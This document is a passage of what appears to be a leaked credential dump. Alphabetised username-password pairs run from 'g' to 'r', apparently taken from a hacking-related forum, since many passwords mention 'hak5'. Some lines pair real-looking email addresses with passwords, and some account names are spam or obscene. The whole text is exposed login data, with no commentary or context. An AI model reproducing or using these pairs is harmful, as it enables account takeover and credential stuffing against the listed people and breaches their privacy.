gromerdok - gromerdok66
grs - explorer
g. s. mcnamara - gsmhak5pass
g-stress - stress
gtah - Gh0&#036;+&#036;
guabowl - DowBoync
guafttets - DQORumC983
gumby - viamirola
gumpalm billionaires race - sdfwretdfdf
gumpalm fashion for billionaires - sdfwretdfdf
guring - azerty
guyintheroom - jesusrawkz
gzcpnki - QsEfTh22
h2oh4x - qwerty
h3xan01c - Ag3nt:0rang3
h4ck3r5 - FILAFILA
h4x0r746 - kaitlin1.
h5n1 - 90009000
h5n1 - giraff
h5n1 - giraffene
h5n1 - munkholm
h5n1 - sammenstilling
habibibi - 123456
hacdan - b4hand99
hacker@sr.gov.yu - samoja
hadak - melissia
hagdresegoodo - CLsrIvW327
hak55hak55 - packword
hak5matt - i99Eg4117&#036;
hakrat - ------
hakrat - 22cool4u
hakrat - 2cool4u
hakrat - 2fat4u
halegretavi - 9fzlFZK516
halxjtg - QsEfTh22
hamper - d64gci
hamper - d64gi
haniauton - HShbt0F478
hapster - magisamdg
harfangesse - 79lbHxn733
harry.mat - MADEIT
harshreality - 40440404
hawimpalarawn - mrC5tKd396
hawksprite - redwall5
haxple - hrendevouz23
hayden - 123456ss
hayden21 - 123456ss
heidgidginc - kHThaVL163
heireacle - z5jNZQb788
hellkaiser - yarpnarp
helmutmossbach - trf1WJ8564
helpme0k - hahaha
heradeeby - 0lR8bbT787
herki - mucha81
hexskrew - blacksink27*
hexskrew - blacksink27
hexskrew - blacksink278
hgrcewr - QsEfTh22
him1123 - Him1123&#036;.HAK5
himesasax - UDiOJWO667
hinzinho - yW5Q44E3
hitaalagift - OGP3E9L496
hitooutwala - DhFCXWv427
hiwykil - QsEfTh22
hogcoladido - AdgPFz1882
hohutoksev - D7IQw2H232
hollmark - YUIOP
hollybrooking - ike02banaA
hollywood16 - q123456
holtbp - b539131dd4c18c1
holtbp - Palmer7&#33;
holymoo - gibtde
homebrew hacks - 0121hak
homeless - shitty
honvoxlountee - 8AUuksot1qa2
hoople - friE3nd57
hoormgartk7 - 1RfUp60845
horza - hlatblasonir0
horza - hvuvivru6
horza - latblasonir
hosejoseipax - 12axzas21a
hosexazasaz - fWh0cK2583
hosexazas - fWh0cK2583
houseofbugs - Waterclocker89
hryba - robotics
hurricane - trust2
hutccvr - QsEfTh22
hydeciel - kawaii123
hydeciel - kawaiisensei
hydeciel - kawaiisensei@19784
hydeciel  - kawaiisensei@1984
hydeciel - kawaiisensei@1984
hylas - alliance936822
hzahtuv - QsEfTh22
iain - C4duceus
iain - C4duceusC
iains - C4duceu
iajrjop - QsEfTh22
iamwill - hak5pass
ibionika - 0SbcH4Y824
iceberg - 9eas6fm4
iceberg - plasma
icociaxila - 147852
idefypi - bushisking
ideodomup - KDPURAD242
ideototiptopy - wzBTIAU143
ignatius - C4duceus
igorokk - Mantalaboy
ihaku - gsrroca8733
ihatethievesthatfuckmymoney - IjCH2r2243
i.have.rewt - jamies
ihmemies - 12rt67UI
iisonly - hak5
illiliseets - muCfckR922
illittaxitend - 112B5X3297
illuchjuiff - 8QFPczd249
ilookjanny - naO2e67467
ilya_rabinovich - moadon
imagin4ry - 350963
imaginary - 350963
imaserbaretah - JXcEYzP513
imgood - 95bd2dbdfbada8e
immobsesror - LALqCf4117
impaimaspal - lmcYteL567
impopyguimi - 0ui8Hxy312
inaraarringnup - JessNall
inciginue - YoEBZa3566
incurcike - ZtysGOy586
indianpharmacyonline - 24031974
indissign - 4GCgAnq878
ineldcoonipep - 8etthdz954
inf0lookup - Samuel22
infolookup - &#036;@MU3L@@
infontonseelenly - KUjkZX2435
infopyshopy - ySxcF49355
infosecgeek - sh1nob19ii
ingasalna - drkfsdde
inhifappish - DVg7xyA633
inkopank - a37711f11e5a2ad
innickglance - 6DHPqhr833
inorrible - 7koBYz6936
insaloelisind - 123456
insurance - insurance123
intataaddepay - IkKemcr459
intergage - qxc50%cs
intictacquins - AOaCn9U499
investe - 5et8j634
iodicscor - v7krfo1614
iordanov swarovski vodka - sfdfgsdaf
iosys - UPvtC61UvdlXv0`OVgGyiy}x
iowyou - march301993
ioyou - march301993
ip_anywhere - entre
irc - ------
irieb - barley88
irieb - barlye
irieb - c3dc774c0bccd66
irieb - caroline
irieb - varoline
irootuv5 - JzAI6xD743
irrafeembor - yBonbPB385
irreptors - i9YZsCc682
i run unix - bigman
isacneo1 - taveras
ishan - abhay
iskilled - 504fa0
isopackmips - NFYSd5N924
italiano40 - mafia2
italiano40 - mafia22290
itayati - 39864251
itayyati - 39864251
itayyati - i3669282
itenryanorded - uE4F5E5458
itxyube - QsEfTh22
ixgamerxi - poopie123
iyeman - OmiOmlp0
iyeman - r0Gu34./
j0hnlennon - iloveilife05
j35u5fr34k - J35u50513
jaapk-nl - 2mlfAdX454
jackeye - l3njeb
jackshadow17 - magical101
jackspayed - batma
jaggededge - 200701203
jag - hkmp5k
jagwire - 14np1mp
jagwire - blackmail
jairlkatstask - LLYx8rs519
jakdripper - passw0rd
jakeellans - oK18Sao966
jalierressy - vRBWlgr874
jallchiesia - tUTAiK5252
jamazz - danger
jamazz - TinafLP&#33;
jamazz - TinaFLP&#33;
james@briggsconsulting.net - Budlight08
jamesowens - 1626a29e0425302
jamesowens - a29e04253021626
jamesowens - h4k5inva
jamestkirk - QmbdZxm263
james.yoder - Y59kT4uI
jamezb - tpain123
jamiesbird - CKEaJUh344
jammyreds - ozadCE2977
jamnecollshe - 7ebQ8us469
jamser - 2046402
jamser - 20466402
jamster - 20466402
janders223 - sah125
janemalka - hLNNbxQ115
janeradriges - ZVjmHgC355
janicegreatman - ike02banaA
janteetew - vBVGupC537
jaredcheeda - jensmith
jaredmoona - 5r55Zba163
jarmooldviova - Dtzpu4x673
jasonb - Volcom87
jasonconley2537 - iknowyoucanreadhis
jasonconley2537 - iknowyoucanreadthis
jasonconley@yahoo.com - iknowyoucanreadthis
jasonzaluski - jz7007
jatwilla - amy051bY
jb2001 - fossil
jbauerctu - pl80ff00d
jborunda - nitsuj
jborunda - nitsuj67
jbueltman - jb101474
jcnconnect - jman80140
jcollins - qwerty313
jcsntoll - d4tcxr
jdogherman - action
jebyweege - cJfuTHh822
jedigenii - 2b91888ec98c9e1
jedigenii - allen540*
jedigenii - allen540
jedigenii - gotigers08*
jedigenii - gotigers08
jeffersongates - Money159
jeffzz - Ag03XGx218
jenifferdragster - ike02banaA
jennywishnoff - Sr3jNEq992
jenyip33 - 24948698
jeoglelunlili - tygqOko941
jesman - 4evergood23
jesman - hannover23
jesse6923 - jmeister
jester - jamies
jfranklin - azttd357
jigen87 - terrence
jigglebilly - M*nkey00
jimbobdaga - none123
jimcrashmire - V6SgUdP914
jjallenfit - JklD465242
jjester - jamies
jjhappypants - 855cc4c48939343
jjsmillo - 13a82aK395
jlgarbanzo - saab9399
jmcmanus - ad00d060eaaddc3
jmcmanus - j0ek@&#33;nhak5
jmedlin - j33pxj
jmmc1397 - SSaC864
jobdone - abc123
jobdone - vodafone
jodeawabawmed - koJOWJU532
joe1986 - &#036;l1pkno+
joebbob  - Dusty3737&#33;
joedarkon - 123qwe
joerg - lVk0P-1P4IM5hnAClDfB
joeypesci - c@rlyhill2000
joguest2k - h1st0r1c
johantheking - ferrari866
johantheking - ferrari866audi
johnettav - 4cNuWGu438
johnlennon - iloveilife05
johnnogolanza - HnpSZA8547
johnnyrage - weetabix26
johnotlyric - rigel5115
johnyb - jsbjunk62
jojorififi - Ln7TzIm146
jokerjc12 - hyrule
jona - 3v1lserver
jona@leadingedgetech.org - 3v1lserver
jonas - 0859fa8f5069859
jonas - jonasku1
jonatandon - OGqk74x978
jonaz - 3v1lserver
jonesnor - jonasku1
jongbel - cherrievie
jonkeegoetels - 11R0NO9797
jon_manley@yahoo.com - 0501cs
jonnowoodnz - sentra16
jonnowoodnz - y3hg8bzr
jonny190 - Remy13/05
jonny190 - Reny13/05
jonny490 - Remy13/05
jonnycake - hackerforlife
jopankpaype - f3TRAaK321
jordanshoes - qwert123
joseph2009 - jo5765
joshtegart - hueb1jan9my1rip6
joshtw - aRvAB3hTDDp6AtIWytiF
jprice - stamakA5
jreed5660 - usit5660
jreed5660 - USIT5660
jspitsmatacara - hHB9RqG679
jtruman - dovies2u
jtsnowboy - cba321
jtsnowboy - finish
judafonoxu - ozFhaCP234
jufjufjuf - 1a1a3c7g
jufjufjuf - user367
juf - user367
juicesaupesen - J0klhte826
juliusceasare - youora33a
julultartiree - YORxK7D648
jumpinaround - jumpinaround
juppywhanna - f3EY3nc153
jusetespita - IEz3K8L988
justhentaisixnine - RcAO8Bg397
justintellectual - Zl8yKs9119
justme - 7f58ec82d9164a3
jwalker86 - walker
jwalker86 - walker@86
jyimvrdjygh - zxczxc
jzman - jman80140
kaervak - kamikaze
kafefealo - jyvZ7CE299
kaffluelp - 3WRs3jO576
kairozamorro - 1neosmartstatestado
kalayaan - qcwleerm
kanadaguy - 2kewl4u
kaolin - andy65354
kapereada - LkF565Q888
karmiktrance - cal8c@tt
katrenwhisz - youora33a
kattitete - KXRWct3269
kattyblackyard - ZVjmHgC355
kaustubhnatu - 132bgpospf
kay50 - 1281985
kchap91 - kpsrnqp
kcirtap - f68570a88b0f6e2
kcirtap - nokia6600
keelbug - 86103921
kefaffeside - Fa6SKui776
keith55 - 7914058
keiyentai - MaliceMizer666
kelly brown - ZVjmHgC355
kellyhudge - ike02banaA
keltha - 112358
kemspeeneks - hIUnstH449
kent99 - zse4rfv
kerberos - maketakunai
keriveddern - qwwqwq777
kernelkrunch - krunch
ketchupsenf - goinplz
k.eternity@gmail.com - reenork88
k.eternity@gmail.com - super88duper
k.eternity@gmil.com - super88duper
kibosh120 - acdc1
kibosh - acdc1
kibosh - acdc120
kibosh - orange22
kickarse - forgetful1
kickarse - forgetfuul1
kictpaida - 7WaSEDR629
kilkasumm - SWqbQeI648
killhha - dontmesswith
killroy - duffer
kimberlymn - q1w2e3r4t5
kissulyanka - 123456
kj57 - carolina
kjdmdlk - QsEfTh22
kkeazav - QsEfTh22
klaidxq - QsEfTh22
klementsmume - pam2233
klikersoo - uZPWeLE275
kmtncyt - QsEfTh22
kneeseedoma - podnTN7656
knisekew - doutiout
knoppy - sy44rb
kokanee_100@hotmail.com - Rubicon5756
korn1699 - KikAss69
korny - seagate
korny - wargate
korny - warmtx
kozmik - C0smic1699
kqwnjhi - QsEfTh22
kramer - v7dd32007
krisbelucci - ZVjmHgC355
kristfry - 31101979
kristiop - fisherman
krnckliundev - timosha
krunch - kernel
krutwarezer - VcRqHeU883
kung fu jesus - eraser
kuric - pasca11
kurkoebnow - ZVjmHgC355
kyashwanth - 4pz2b71/.,
kyashwanth - rt9cr.
kyle 2.0 - sarge
kyuuzo - bushido=ronin=047
kzeaiqw - QsEfTh22
l0rdnic0 - 0reg0n
l0renic0 - 0reg0n
l337g33k - 4e7h22
laam - dieten
lacakid - thisishot
lafgroolf - KYOecOG873
lagslella - n8Xf0GL996
lanephillip - test123
lapdanceh - HyOgltS7
lapdanceo - HyOgltS7
larry2 - hOy68iQ2J4
laseteeno - AYb9z3S416
lauben - ------
lauben - L4ur3nc3
lavahot - rcx043697
lazaruswws - schoolsucks
lazygenius - vRN4QQOL
learnmandarininchina - Nk090Vu358
lechacal - d0om3d
lechacal - D0OM3D
lemckldtiundev - timosha123
lenjolley - Nb2i9H3184
lesappeli - 0prnpwt282
lesbian incest porn - kakaxaqwe
lesfonero - uLLneverGuess
lestaeraxa - UDiOJWO667
lethalbadger - jb41588
lettograywi - VcRqHeU883
levidurham - Giihh4|rwtw
levitraes - 123456
levitraes - Kj7Gt65F
lexcoupegirl - YV9JTwD793
lexlukkia - alexhak5
liaichekneere - 26EKCsb456
liaicsempiree - XJXFOxw548
liariahepay - 3OsUJ8r347
librenaut - happy5
lictweecibe - HPXFUeV618
liderctckliundev - timosha
lidstckldiuldev - timosha
lieanaolssen - IgUUUQH945
lifehackeradmin - 73325985ff989e1
liisikeneaa - jdR8cG7431
likos - paok12
lilabgle6@yahoo.com - chris6
lilangel_6@yahoo.com - chris6
li_leejohn - loveYoujohn
liletesiniosenot - 0nkG7vz636
lil_johnf - johnsf3
lillou82392 - futbol02
lillou82392 - futbol82392
lillou82392 - soccer82392
lilmboutt - RjPEcgw758
lilmissbig77 - stephanie
limbert_s - smIDTOf984
linijossy - 7fnxdF7935
link123 - starwars
linker42 - starwars
linksasisvx - z14789632
linky1124 - 282324
linnie94 - Bungee09
linoleum knife - bird99
linuxone - dolphin567
lisakudrovichz - ike02banaA
lisa-mona2007@yahoo.com - baldy
listeningquietly - bungee
listeningquietly - Bungee
listeningquietly - Bungee09
litefire - sophie101908
lizzochka - G0Aun2Q281
loaskdeds - j1UB961443
locu - verp00rt
lodylinehowly - Ah3dUnP486
loftrat - 8qImFEHDTIEcgeBbd7zX
loftrat - FEHDTIEcgeBbd7zX
loftrat - ImFEHDTIEcgeBbd7zX
loftrat - qImFEHDTIEcgeBbd7zX
logicslayer - zaDR57Ru
logicwater - minigo21
loginas - z1478963258
lohitjethwani - sohousbb
lomiinvone - 147852
londonseoexpert - TrWXlUl815
lonix - who.am.1
lopez1364 - MY&#036;horty@hrt1364
loptoocaabace - 8C0HPJW747
lordanakin55 - ta030682
lorddjinn - Genocide777
lord rayne - harrypotter975
lordtalon - reisinger
lorenco - xN38aCL774
loshxdo - QsEfTh22
louie82392 - futbol02
louie82392 - futbol82392
lowillite - 6NCm4vG723
loyamehogassof - FmN23zZ792
loyaraanomy - x6lfvmN585
lsb - 6425nick
lsb - nick6425
ls - Dmr004@zhak5forums
ls - Dmr004@zhak5.org
ls - Dmr004@zhak5.org/forums
l_tiger - cfks51
lu1chy - luichy
luana - ZUvRioj878
luca662 - student10
lucasta - g222303
luk53 - floydo
lulteguct - WCgUzf7951
lunchb0x1988 - Courvoisier1
luvzerbaoyz - 4bYJj1I922
lxa_hunter - futbol02
lxs - all2Fon
lycledalidway - 8DXlaLm259
lyncprory - xtZ9uLZ372
lyngeange - g65Azqb224
lynki2009 - aaaa1516
lyonrt - kerberos
m1k - mariana
m3747r0n - qwerty
m3747r0n - treagus
mab538 - garou324
mabas - zerohero0
machstorm - F03nsics
machstorm - F0r3ns1cs
machstorm - F0r3nsics
machstorm - F0rensics
macreed - wert4009
macro - Mahmoud
macsdd - Kashmir1
madhatterm - lucky1
mad pierre - valver
maennerrat - qdQdQjw586
magginua - dzqiPLp797
magicopromotion - kcJOHCl232
magusnet - weaklink32
maindorenekoser - zskddm56jjdd
makmarak - 96df5a7b98f9b3b
maliksandr - AikIiHb198
mampiseefrefs - TCyf7D2266
mandrake99 - t0day6
mangafree - VBdweert
manola - romantic
manouche - 44112886d1d1476
manouche - contrapuntal
manouche - stochelo
manster - adpadp
maq - 3af073440d83f4e
maq_vega - ivermc
maq_vega - password
marauder - 4pz2b71/.,
marcecabs - CvIwqUb365
marconius - 23wesdxc@#
marconius - 23wesdxc
marcuswalker - 7nBrZob322
mark55 - awesome
markeganfuller - emleckenJenni13J
mark manching - do396from231
mark manching - macmac
markmonster - Mdbdi1981
markoboy - babajee
markw7 - dell12345
markwahlbergtwo - dcl11RRR
marniebless - ike02banaA
marsknight - raye
marsknight - rayehino
maryanderson - 1234567qq
maryannflesscon - ike02banaA
massif - maggot
mastergamerjk - jakers0
masterpj - master
mat - 96e928f72672ff7
matessim - xcoolx1
mat-hak5@anyaddress.net - 96e928f72672ff7
mathiaskt - jeanne40
matta - newzealand22
mattdotdeb - 5774068ba016749
matthew0k - admin@dexter26
matthewlong - carpet
mattrapyrhymn - T6wsnqE221
mattyc - Th3B@r0n
maureendepew - test123
mawelch - F*ckyou
maxam - Mahmoud
maxdcleaclege - qwwqwq777
maxddedsspeerma - qwwqwq777
maxehhh - 629462
mayonnefe - 7T4q7Q3116
mazzurbaf - hUyFDKh968
mbierly - notinnavy
mbp - samisajew
mcampbell - yank99
mchelen - h5zxmats
mcristina444 - a3pecdnd
me604 - 3f399802
me604 - 4c32c7729249945
me604 - fubard1
mealeheiceacy - wjByfwI554
mecypeelp - lmmptEe852
medic642 - dnipro
mejjiloserz - d67sjjdooe4d
meladzesz - 32mel32dzes
melina - chris6
melina_lilangle@yahoo.com - chris6
memphix - 687231184
memphix - mpx687231184
merctom - goo5587
merellolssen - IgUUUQH945
merunwiggisp - ZYxCRyv993
messsy - mcmullady2k83]
messsy - mcmullady2k83
metalanruhi - wVc1wNV235
metalwolf - kzh77b4o
metatron - hackme
metatron - qwerty
metatron - treagus
metho.2ya - 45ebcb585e16a99
metho.2ya - 95fa341b5ecd9d7
metho.2ya - fucktheworld
method - june1980
metho - fucktheworld
mexemerma - vUTo8Tr545
mhbumxi - QsEfTh22
micah - euk4y12g9
michaelangeloiinternet - fCnuute216
michaelkingstins - 6Cnuute216
michaels-jackson - hNZR2fR767
michelle - boogerboy
micr0 - 795135465123
microft - dakota6
midantzler1960@yahoo.com - mel123
miha_tatu - 123456789
mihnea.spirescu - spiremvp01
mikaelreplicats - eRmacjS484
mike160 - hardcore160
mike160 - HARDCORE160
mikefthl - ld0jzx2869
mikematress - 5kHPucK172
mikemoore3456 - 7a280b348399c39
mikemoore3456 - Ubuntu1111
mikeshinnza - eNyPK5d316
mikeymike - 786786
mikipao - admin7
milan - Petoo
milkmonsteroer - sHy1h1y967
miracle mike - a1a1a1a1
miraclemike - a1a1a1a1
miracle mike - LabFnty8
miraclemike - LabFnty8
miracle mike - WtnHigiO
miraclemike - WtnHigiO
mirandaonyou - ike02banaA
misfitsman805 - ------
misfitsman805 - wer138
misterandersonsik - rTGPibX198
mister_eag - eGdFedBp2006
misterex - potter
mistertylersmith - psi5glitter
mitchel74 - august07
mitchel.deyoung@gmail.com - august07
miyagui - 123401
mjkrmld - QsEfTh22
mjo1967 - 4264807
mleo2003 - charizard
mminutel - ahyxzty8
mminutel - AhyXzty8
mnemonic - kinjiru1
mnemonic - kinjiru1kinjiru1
mobescosy - 8fyRioH948
mochecreara - OGP3E9L496
monsterpully - RqPomk31
montgomery - 123456
moonlit - 2185e812378f5de
moroascerge - yBonbPB385
mousetech321 - brathu9h
mralvin - mralvin46
mrankaku - Nate9416
mrburns - QVnRObtAg7aq*Az
mrdeyoung74 - august07
mrdeyoung74 - August07
mrdeyoung74 - august2007
mrgrim - password
mrgrim - password99
mrlapa - janna2
mrootva3 - JzAI6xD743
mrskibone - mixx01
mr.sp41t3r - omurfatma
mrx - boomerangburn
mr.xx - xxxxxx
mrzodiac - #th1992#
mschulz - chino1
mschumak - 5LP011407637iim7
mshenoy4573 - schue4573
mshenoy4573 - schue69
mshenoy - schue4573
mshenoy - schue69
msp301 - poison1990
msqueak - ------
msqueak - 023186
msqueak - 736a96632c88870
msrkpro - shg567893
mubix - gegameri
murzikbig - oI5wT0p575
musclegeek - sh1nob19ii
mv1608l - Laptop
mweber - 121191
myehgyr - QsEfTh22
myncsoolo - gPX1Yn0679
mynostalgiyaussr - G95hfafFd904tjh
myronhinio - mp150888
mystiq - qwerty80
mz-sophie.lowe - 9oT3QmZ288
n00berster - noktem211
n0gear - hellohello
n0x - R0binh00d
n1ll0 - 1l0n3ly#
n1ll0 - n0chumps
n1ll0 - nochumps
n3cr0s1s89 - kickass
n3w_g3n3rat10n - @l3x@nd3r
n57green - dawn
nab_coder - &#036;tr0ng3r
nab_coder - chocolate
nab_coder - chocolate1
nabloonnaweaxytu - sDe0PEI926
nabsabingekes - lSbjvYv131
nakeidediagma - lOUcRaR979
namibaiclence - YJta1HQ277
nantokanare - 10DragonBitou&#33;D@
napisani - music18
nashuar - 7fpHUjiBvVy4b49QNOpXv6DTFbtnY3M3
nashuar - trust
nath042 - eb3eafef2e2e0bb
nath042 - gmg104
nath042 - ngmg104&#33;
nathalyslim - Money123
natural2009 - jo5765
nawab - abk&#036;163
nawab - abk163nawab
nawlalope - 6UTeezi736
naxoz - e626oiss
nazywellola - swlXNoF957
nctsuall - OXzjPrG748
neas15us - anderson
nebster - GameOn
nedzalife - n3veragain
neebmandimb - BEc3D6L572
nefebrest - nyvx0xi461
neg2led - phreak213
neg - phreak213
neidenuikenon - zwJpOz4
neinsager - PDQSPwlP
neldarosannet - KFkVsKf816
neolinux - neoend
neonknight - f0rget1t&#33;
neonknight - Matthew1
nepodesiby - DNwtWW4664
nerbie - her613man
nereteora - eoizI3D436
nerhioperfdde - fdf8jkmnf3
nerkelrderxx - cx78dskkc
nerlorefdplf - fdf8jkmnf3
nescire2c - 4evergood23
nescire2c - hannover23
nescire - 4evergood23
nescire - hannover
nescire - hannover23
newengland72 - 12aBC&#33;@#
newgay - fCkkQx0274
new_generat10n - @l3x@nd3r
newsatforumz - bJSgB5q397
nextemume - yBonbPB385
ngfidhif d - aVyyljH618
nhuth - snowball
nicatrontg - pwn|<3yg3n
nicatrontg - pwn|<3yg3n5
nicatrontg - pwn|<3yg3n5&#39;
nick_dizzle85 - Nb1017115
nickinfocus - XrVch7X837
nick - n7710521h
nick - n7996303h
nicycurgy - ij6miif974
nigbrieli - soEFu7o278
nightmares0nwax - select
nikalalaka - TRbS9Oy384
nikkione - KpHNcny759
nilainers - flK9nWf454
nillp - nochumps
nimamayobby - BU7UirK427
niniqueuemn - 9un1tFC627
ninjalootr - d0wntime
nisavillaneag - Cqi1egg876
nitrous71988 - jade71988
nitrous - jade71988
nitythign - G8ZuWAE367
nlpgrusla - ac24388a
nobtotoenvevy - XgJZo66514
noburnviak - Vd0dN13686
nomatophobe - snoopy525
nonwelder - marvin076
noob - lamepassword
noopie - 1ml33t
nophix - sabri3l13
nophix - sabriel13
norwat - republik88
nostalgiay - retero282yyr
nostalgiyapo - retero282yyr
noui86 - test123
novawelle - 9999316
noyabrina - 123456
noz482 - Noz482&#036;&#036;
nrqzpkn - QsEfTh22
nrw77 - CtrI843325
ntnvquw - QsEfTh22
nuadaorance - hVWhmg8353
nullarray - iPhone3)
numeric - zxc1asd2qwe3
numeric - zxcasdqwe
numtultinpups - su8uBBo758
nurguzik - nurguzik66
nuridiuntee - eHpfLcs258
nushhault - Jii8KGu742
nutrond - nutrond66
nxt471 - dl7ipdl7ip
nyqmbjk - QsEfTh22
nyronic - nyroh4x
nystral - R0otb3er
nzcontractor - Cx9mk4U175
obemabnonge - sLGNr0J184
occagmaacesia - N8pdFPw282
occubobia - umbXAm6221
occuctisono - gCqx22F799
occulsefupe - vRBWlgr874
ocwilliam - A846eaH314
odontedyfropy - UtG5SvG423
odwantwogold - ITOch1k174
oemsoft - Kj7Gt65F
ojk007 - sleep007
oklpawe - QsEfTh22
oldfecker - qwerty80
olexbamus - master222
oligarchy314 - charlierosefornerds
olololok - qEJQosR761
omgitsmit - sw0rdf1sh
omrxo - boomerangburn
onenightstand - JO5r9Yi179
onerqqerhi - df6yfhdjx
onetwothree - CVvR6gt148
onlinecasino - dla9b1n945
onlinedating - 786786
onryo - 09d95df474491bc
onryo - 0okm99ijn
onryo - 0okm9ijn
onryo - +pl,0okm
oomrxoo - boomerangburn
operat0r_001 - whocares
optics - dudecoolman
optics - dudecooolman
optioloaffime - pc3lotj674
optoddeda - ldHsKn5348
or4n9e - schwiebi
orartykitte - 28FHJYP487
orbibimmorn - yBonbPB385
ordeldcek - TIgv049215
ordernhek - Pik2pyd246
ordewsgoraded - jp02WaZ492
orekkneenda - G1y8hSl616
oscar - gee5hak
osciseartesse - qbKVZNK245
otillatroya - WF9wllatro5a
otm54 - 5YtjdD0875
outletmaller - mFEKPnw769
outradenura - so4ib0F288
oversoft - his9pop
oversoft - x4,.aFxeRD
ovtgurr - QsEfTh22
ozjoseph - 51adAnS863
p0lis - cypis17
p1ccolo21 - Samuel22
p1ccolo - Samuel22
p1t2i3k - ------
packplus59 - 123456
paddy - 7l1B9I5443
paealos - z0auDXs891
pajtimi - megianisa
paliamaft - XpHw0m3881
palmer91 - ldtp
pancakesabotage - seaw0rld
parabellum - vqlqVYP759
paradigm - nightglow
--parrax-- - worldbc
partygirlsuzyforyou - YHcdAkg392
passivekid - kw4bt6ai
patiencebechtel - test123
patrick_plan8 - 1233eddfg
patt - 112317
paulf10 - p3w33aa
paulinepartygirl - wIbW8TS228
paulthegeek - arcus32&#33;
paul_wct - radiohead1
pauptelay - nyvx0xi461
pbossman - password
pbvinge - rugby4life
pbyjvrr - QsEfTh22
pc349bds - fucker
pc349bds - fuckinghell
pcooper1983 - 36f46e3eee410f6
pdquickk - 324390
pealayarcanny - c9OFfNB833
pee45 - Pee_45
perianeso - oC1Pxto725
pespamiawailm - Vp9XEVO734
petercollins61 - YNhnvBz369
peterdthl - ld0jzx2869
peterndthl - ld0jzx2869
peterpense - peterpense00
pf100 - mxptlkha
phaladenece - umbXAm6221
pharmacy - Kj7Gt65F
phasma - new0ne
phenlymeemolf - lOUcRaR979
phenomtech - mnemic
philking98 - ourgrace
phongn - allucan2
phottoshop - Kj7Gt65F
phreak9001 - 37447a
phunka - basstabs1
phyrrus - hacker
pichet - 0227c73b8ac2c38
pickerin - logan1
piepjaisade - fdnDGW5863
pier - ajk04122000
piero - camini
pierr - ajk04122000
pineapple - password
piotrj76 - hhdownload
pislisallygen - jdrXSVO728
pizzaguy - marcus
pizza - rushabh123
pjajodj - QsEfTh22
.pj - jajaja
pkmx - qazwsx
plainereandic - HWwpLXH776
platavadano - 8fpO8w2413
platinvml - y2DTAU5562
plbour - S1i8g4m3@
plettyintinnes - wavytast
plexslews - TIgv049215
pn2865 - pool4deer
pneunkanaph - Xo2Woi1812
pnutlmclain - 393375
pock123 - westside
pock - westside
pock - westside20
poedahedakepe - TfurgIc253
poedaywrery - TIgv049215
poffer - popkiss
poffer - popkiss123
popsikmopsika - gt749fh99eh8
popsikmopsik - gt749fh99eh8
pornbaronzsa - 32mel32dzes
pornobedboyru - pornobedboyru00
porosenochek - c2kpEIF919
potenzia - jXh2ziA619
povelitelsok - asdf12344
powerfulmeds - youtbea3a
powerfulshozaz - youtbea3a
powerfulstrea - youtbea3a
powertrip48613 - bond48613
pquin7 - 1914pq
pr0tean - 1m3t41
pradlydoulley - 1GZAY9m686
praxis - wildman
preatevop - bywVODc314
prem123 - 258741
prenclerheica - OSeGiBH248
preospefs - xCp7GAW872
preshegreks - 266FPPN824
presidentp - rjX5bbq576
presidenty - rjX5bbq576
prime - Mdsy&#33;ME(b~-d
prismtheory - ragnarok1
pritchard92 - pritchard92#
pritchard92 - pritchard92
pritchard92# - pritchard92#
pritchardo92 - breagha92#
pritchardo92 - pritchard92#
privatefotko - kT7Koik421
professr - localhost
prohessarloff - Ui1ouSa465
prolonge - TN15H582
pronostalgiyaa - gt749fh99eh8
pronostalgiya - gt749fh99eh8
proplexpazeled - qpX8xFY958
proskater123 - 998627
proverkazhizni - 123456
prowin - TECHNOLOGY
prowsrupt - 9FhA3PW252
pryorda - 31337z0r
pryorda - 811034f11331424
pshumar - hlmjmt07
psionicfungus - ^&#39;(+w^6&Q=-YEF=e3*?b
psycho-j - lizzard
psycho - lizzard
psychosis - y20623
puredistortion - 6666f36c3ff6f3c
puredistortion - 6666f36c3ff6f3c
puredistortion - noah02
puredistortion - Noah2002
puremate - whatever&#33;
puremate - whatever&#33;"
pvr02 - jefferson
pvr2002@gmail.com - tw1nk1e
pwnstar - 0okm9ijn
pxmgihk - QsEfTh22
p@y@&#036;007 - FERTEAMO_6466@
pyncinjenty - lOhrq78835
pyth007 - 500fr200imhak5
qanwjhw - QsEfTh22
qbnhgbr - QsEfTh22
qikslvr - podunk
qjwcwcd - QsEfTh22
qpoxdk - HACKmeNOT666
quashluff - qpvxk4K
quaz212 - alice212
queernquiergo - wkuljEU258
quizme2000 - uca23013
r0ntr0n - unlock123
r4v37t - l091nc1nt4
rab - donkey
raberape - raberape18
rabyseepe - 7jtAlpk647
rac3rjxs - spdrac3r
rac3rjxs - spdracer
rac3rjxs - trixie29
racerjxs - spdrac3r
racerjxs - spdracer
racerjxs - trixie29
rache - 80p02l04
raddydupbaddy - qARuY6P672
radosintra - sklifshishabi
rageguy - 0312
rain724 - 20ozsprite
raku - DaleK/1@98
raku - shipon1
randomclown - 1500668802084962501639100
randomclown - 1500668802084962501639150
randyslimg - Money159
rapeanal - rapeanal18
rapeassa - rapeassa18
rapebabe - rapebabe18
ratmandall - i-am-c00l
ratotoish - 1yxnDJd963
ratzak - rat@hak5F
ravman - sandygirl
raze - 3xcr2m3nt0r
razehell - 3xcr2m3nt0r
raze - M1CH02C2N
razingman - 213456789
razor512 - cutemedabee
razortap - gray5050
razta - abc123
rba1988 - magisamdg
rblckmn - scorpion
rcggneq - QsEfTh22
readyandable - a123456
realbestolssen - eRRt86m656
reapertura - iedimes
redearl - L3tm31n200
redearl - L3tm31n2006
redog70 - xoothaxa
redsorrow - 2hi@#td4u
redsorrow - turkishak
redxine - @11zhvpr
reenarith - VI1JTkW826
reepolleyk7 - 1RfUp60845
reepoppocabor - YAmF75j729
reernehor - Vs1zuxK343
reflux - 759571
reflux - 759751
reigbuttthift - Nb2i9H3184
rekvids - rekvids00
relsneria - 6U7O2R5YQ9G
remcreaps - Vp9XEVO734
renegadecanuck - 243428
renikelfssa - ds6jhfkjde
renikelfssa - dsdyjmfdf3d
renoanymn - retCnmO961
reopefendunny - 6NCm4vG723
resgreago - yz0FUuN895
resix - tyrolit1
resnikov - cr@pg@me
retrolx - sy44rb
retro-starr - ------
retro-starr - F0rums
retro-starr - F-rums
return.404 - james752120
revelati - martink1
rfgupej - QsEfTh22
rgujgsefny - zxczxc
ribakby - VcRqHeU883
ric3125 - 4981dill
rican - MelissaMillan-094
ricefaildicle - AIiItRr595
ricenstien - 0cd410a0a40a115
ricenstien - h1st0r1c
richsuk - ricsmi20a
rickieellisons - ike02banaA
rictweriacite - l2VBXqE585
riderape - riderape18
rifsoutfita - yeopB1Q798
rindalik - nonstoper123
